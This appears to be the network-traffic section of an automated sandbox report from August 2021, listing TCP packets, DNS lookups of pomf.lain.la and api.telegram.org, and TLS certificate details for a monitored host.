Aug 31, 2021 19:39:38.260086060 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260107994 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260127068 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260139942 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.260150909 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260171890 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260190010 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260207891 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260226965 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260241985 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.260245085 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260260105 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.260273933 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260292053 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260314941 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260337114 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260346889 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.260361910 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260365009 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.260369062 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.260371923 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.260384083 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260402918 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260421038 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260438919 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260457039 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260463953 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.260473967 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.260478020 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.260478973 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260499954 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260499954 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.260518074 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260525942 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.260536909 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260555029 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260555983 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.260574102 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260586023 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.260591984 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260610104 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260632038 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260633945 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.260652065 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260670900 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260684013 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.260689020 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260690928 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.260708094 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260726929 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260746002 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260755062 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.260762930 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260778904 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.260786057 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260797024 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.260807037 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260826111 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260838985 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.260844946 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260871887 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260885000 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.260895967 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260901928 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.260915041 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260932922 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260948896 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.260955095 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260976076 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260988951 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260998964 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.261007071 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.261025906 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.261039019 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.261059046 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.261061907 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.261068106 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.261076927 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.261096001 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.261109114 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.261123896 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.261141062 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.261159897 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.261164904 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.261189938 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.261208057 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.261226892 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.261234045 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.261240959 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.261267900 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.295593977 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.295687914 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.295723915 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.295742989 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.295766115 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.295783997 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.295799017 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.295800924 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.295819998 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.295820951 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.295840025 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.295855045 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.295855045 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.295872927 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.295886993 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.295897007 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.295912981 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.295936108 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.295943022 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.295953989 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.295968056 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.295968056 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.295993090 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.296000957 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.296013117 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.296035051 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.296058893 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.296077013 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.296328068 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:43.054243088 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:41:21.862406015 CEST	49724	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:21.888978004 CEST	443	49724	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:21.889102936 CEST	49724	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:21.979995012 CEST	49724	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:22.006448984 CEST	443	49724	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:22.006481886 CEST	443	49724	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:22.006505966 CEST	443	49724	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:22.006525993 CEST	443	49724	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:22.006545067 CEST	443	49724	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:22.006562948 CEST	49724	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:22.006587982 CEST	49724	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:22.007800102 CEST	443	49724	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:22.007822990 CEST	443	49724	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:22.007908106 CEST	49724	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:22.018032074 CEST	49724	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:22.046240091 CEST	443	49724	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:22.090873957 CEST	49724	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:22.270247936 CEST	49724	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:22.301635027 CEST	443	49724	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:22.304241896 CEST	49724	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:22.373354912 CEST	443	49724	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:22.616424084 CEST	443	49724	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:22.669049978 CEST	49724	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:24.161241055 CEST	49724	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:24.188364983 CEST	443	49724	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.188621044 CEST	49724	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:24.237076044 CEST	49725	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:24.263853073 CEST	443	49725	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.264019966 CEST	49725	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:24.274286985 CEST	49725	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:24.300817013 CEST	443	49725	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.300853014 CEST	443	49725	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.300877094 CEST	443	49725	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.300899982 CEST	443	49725	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.300919056 CEST	443	49725	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.301192999 CEST	49725	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:24.302069902 CEST	443	49725	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.302087069 CEST	443	49725	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.302212000 CEST	49725	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:24.304617882 CEST	49725	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:24.331604958 CEST	443	49725	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.334270954 CEST	49725	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:24.362014055 CEST	443	49725	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.362961054 CEST	49726	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:24.364269972 CEST	49725	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:24.389354944 CEST	443	49726	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.389622927 CEST	49726	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:24.390830994 CEST	443	49725	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.391060114 CEST	49726	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:24.417450905 CEST	443	49726	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.417517900 CEST	443	49726	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.417572975 CEST	443	49726	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.417624950 CEST	443	49726	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.417669058 CEST	443	49726	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.417702913 CEST	49726	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:24.417853117 CEST	49726	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:24.418850899 CEST	443	49726	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.418919086 CEST	443	49726	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.419152021 CEST	49726	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:24.424913883 CEST	49726	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:24.452307940 CEST	443	49726	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.478869915 CEST	49726	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:24.505357027 CEST	443	49726	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.506881952 CEST	49726	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:24.533427000 CEST	443	49726	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.533457041 CEST	443	49726	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.533504009 CEST	443	49726	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.533520937 CEST	443	49726	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.533616066 CEST	49726	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:24.533663034 CEST	49726	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:24.533690929 CEST	443	49726	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.533878088 CEST	49726	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:24.560156107 CEST	443	49726	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.560180902 CEST	443	49726	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.560197115 CEST	443	49726	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.560211897 CEST	443	49726	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.560228109 CEST	443	49726	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.560278893 CEST	443	49726	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.560424089 CEST	443	49726	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.560430050 CEST	49726	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:24.560444117 CEST	443	49726	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.588829041 CEST	443	49726	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.588860989 CEST	443	49726	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.588885069 CEST	443	49726	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.588913918 CEST	443	49726	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.588939905 CEST	443	49726	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.588964939 CEST	443	49726	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.588987112 CEST	443	49726	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.588999033 CEST	443	49726	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.589023113 CEST	443	49726	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.684695005 CEST	443	49725	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:24.731698990 CEST	49725	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:25.132879972 CEST	443	49726	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:25.184905052 CEST	49726	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:36.499098063 CEST	49726	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:36.525619030 CEST	443	49726	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:36.525707006 CEST	49726	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:42.224183083 CEST	49727	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:42.250950098 CEST	443	49727	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:42.251048088 CEST	49727	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:42.251535892 CEST	49727	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:42.277957916 CEST	443	49727	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:42.278049946 CEST	443	49727	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:42.278078079 CEST	443	49727	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:42.278098106 CEST	443	49727	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:42.278119087 CEST	443	49727	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:42.278321981 CEST	49727	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:42.278412104 CEST	49727	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:42.279213905 CEST	443	49727	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:42.279236078 CEST	443	49727	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:42.279321909 CEST	49727	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:42.281764984 CEST	49727	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:42.308535099 CEST	443	49727	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:42.309637070 CEST	49727	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:42.338027000 CEST	443	49727	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:42.338393927 CEST	49727	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:42.365056038 CEST	443	49727	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:42.365150928 CEST	443	49727	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:42.365161896 CEST	443	49727	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:42.365164995 CEST	49727	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:42.365173101 CEST	443	49727	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:42.365278959 CEST	49727	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:42.391702890 CEST	443	49727	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:42.391731024 CEST	443	49727	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:42.391737938 CEST	443	49727	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:42.391771078 CEST	443	49727	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:42.391846895 CEST	443	49727	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:42.391884089 CEST	49727	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:42.391932011 CEST	49727	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:42.391933918 CEST	443	49727	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:42.391947031 CEST	49727	443	192.168.2.5	149.154.167.220
Aug 31, 2021 19:41:42.391990900 CEST	443	49727	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:42.418446064 CEST	443	49727	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:42.418473005 CEST	443	49727	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:42.418492079 CEST	443	49727	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:42.418509960 CEST	443	49727	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:42.418524027 CEST	443	49727	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:42.418595076 CEST	443	49727	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:42.418611050 CEST	443	49727	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:42.418658018 CEST	443	49727	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:42.425363064 CEST	443	49727	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:42.954807997 CEST	443	49727	149.154.167.220	192.168.2.5
Aug 31, 2021 19:41:42.999202013 CEST	49727	443	192.168.2.5	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 31, 2021 19:39:31.496794939 CEST	61805	53	192.168.2.5	8.8.8.8
Aug 31, 2021 19:39:31.534276009 CEST	53	61805	8.8.8.8	192.168.2.5
Aug 31, 2021 19:39:37.835170984 CEST	54795	53	192.168.2.5	8.8.8.8
Aug 31, 2021 19:39:37.869096041 CEST	53	54795	8.8.8.8	192.168.2.5
Aug 31, 2021 19:39:44.421587944 CEST	49557	53	192.168.2.5	8.8.8.8
Aug 31, 2021 19:39:44.463154078 CEST	53	49557	8.8.8.8	192.168.2.5
Aug 31, 2021 19:40:02.508894920 CEST	61733	53	192.168.2.5	8.8.8.8
Aug 31, 2021 19:40:02.557742119 CEST	53	61733	8.8.8.8	192.168.2.5
Aug 31, 2021 19:40:21.532567024 CEST	65447	53	192.168.2.5	8.8.8.8
Aug 31, 2021 19:40:21.577791929 CEST	53	65447	8.8.8.8	192.168.2.5
Aug 31, 2021 19:40:23.641098022 CEST	52441	53	192.168.2.5	8.8.8.8
Aug 31, 2021 19:40:23.682022095 CEST	53	52441	8.8.8.8	192.168.2.5
Aug 31, 2021 19:40:25.622955084 CEST	62176	53	192.168.2.5	8.8.8.8
Aug 31, 2021 19:40:25.655487061 CEST	53	62176	8.8.8.8	192.168.2.5
Aug 31, 2021 19:40:29.174525023 CEST	59596	53	192.168.2.5	8.8.8.8
Aug 31, 2021 19:40:29.210944891 CEST	53	59596	8.8.8.8	192.168.2.5
Aug 31, 2021 19:40:33.150593042 CEST	65296	53	192.168.2.5	8.8.8.8
Aug 31, 2021 19:40:33.194775105 CEST	53	65296	8.8.8.8	192.168.2.5
Aug 31, 2021 19:41:03.647032976 CEST	63183	53	192.168.2.5	8.8.8.8
Aug 31, 2021 19:41:03.682113886 CEST	53	63183	8.8.8.8	192.168.2.5
Aug 31, 2021 19:41:06.020236969 CEST	60151	53	192.168.2.5	8.8.8.8
Aug 31, 2021 19:41:06.056927919 CEST	53	60151	8.8.8.8	192.168.2.5
Aug 31, 2021 19:41:21.736905098 CEST	56969	53	192.168.2.5	8.8.8.8
Aug 31, 2021 19:41:21.763030052 CEST	53	56969	8.8.8.8	192.168.2.5
Aug 31, 2021 19:41:24.208148956 CEST	55161	53	192.168.2.5	8.8.8.8
Aug 31, 2021 19:41:24.233335018 CEST	53	55161	8.8.8.8	192.168.2.5
Aug 31, 2021 19:41:24.335397959 CEST	54757	53	192.168.2.5	8.8.8.8
Aug 31, 2021 19:41:24.360485077 CEST	53	54757	8.8.8.8	192.168.2.5
Aug 31, 2021 19:41:42.197696924 CEST	49992	53	192.168.2.5	8.8.8.8
Aug 31, 2021 19:41:42.222775936 CEST	53	49992	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 31, 2021 19:39:37.835170984 CEST	192.168.2.5	8.8.8.8	0xa83a	Standard query (0)	pomf.lain.la	A (IP address)	IN (0x0001)
Aug 31, 2021 19:41:21.736905098 CEST	192.168.2.5	8.8.8.8	0x8918	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
Aug 31, 2021 19:41:24.208148956 CEST	192.168.2.5	8.8.8.8	0xd59d	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
Aug 31, 2021 19:41:24.335397959 CEST	192.168.2.5	8.8.8.8	0x2971	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
Aug 31, 2021 19:41:42.197696924 CEST	192.168.2.5	8.8.8.8	0x138c	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Aug 31, 2021 19:39:37.869096041 CEST	8.8.8.8	192.168.2.5	0xa83a	No error (0)	pomf.lain.la	198.244.149.184	A (IP address)	IN (0x0001)
Aug 31, 2021 19:39:37.869096041 CEST	8.8.8.8	192.168.2.5	0xa83a	No error (0)	pomf.lain.la	107.191.99.49	A (IP address)	IN (0x0001)
Aug 31, 2021 19:39:37.869096041 CEST	8.8.8.8	192.168.2.5	0xa83a	No error (0)	pomf.lain.la	167.114.3.98	A (IP address)	IN (0x0001)
Aug 31, 2021 19:41:21.763030052 CEST	8.8.8.8	192.168.2.5	0x8918	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)
Aug 31, 2021 19:41:24.233335018 CEST	8.8.8.8	192.168.2.5	0xd59d	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)
Aug 31, 2021 19:41:24.360485077 CEST	8.8.8.8	192.168.2.5	0x2971	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)
Aug 31, 2021 19:41:42.222775936 CEST	8.8.8.8	192.168.2.5	0x138c	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Aug 31, 2021 19:39:37.985586882 CEST	198.244.149.184	443	192.168.2.5	49706	CN=*.lain.la CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US	CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Jul 01 22:08:15 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021	Wed Sep 29 22:08:14 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
					CN=R3, O=Let's Encrypt, C=US	CN=ISRG Root X1, O=Internet Security Research Group, C=US	Fri Sep 04 02:00:00 CEST 2020	Mon Sep 15 18:00:00 CEST 2025
					CN=ISRG Root X1, O=Internet Security Research Group, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Jan 20 20:14:03 CET 2021	Mon Sep 30 20:14:03 CEST 2024
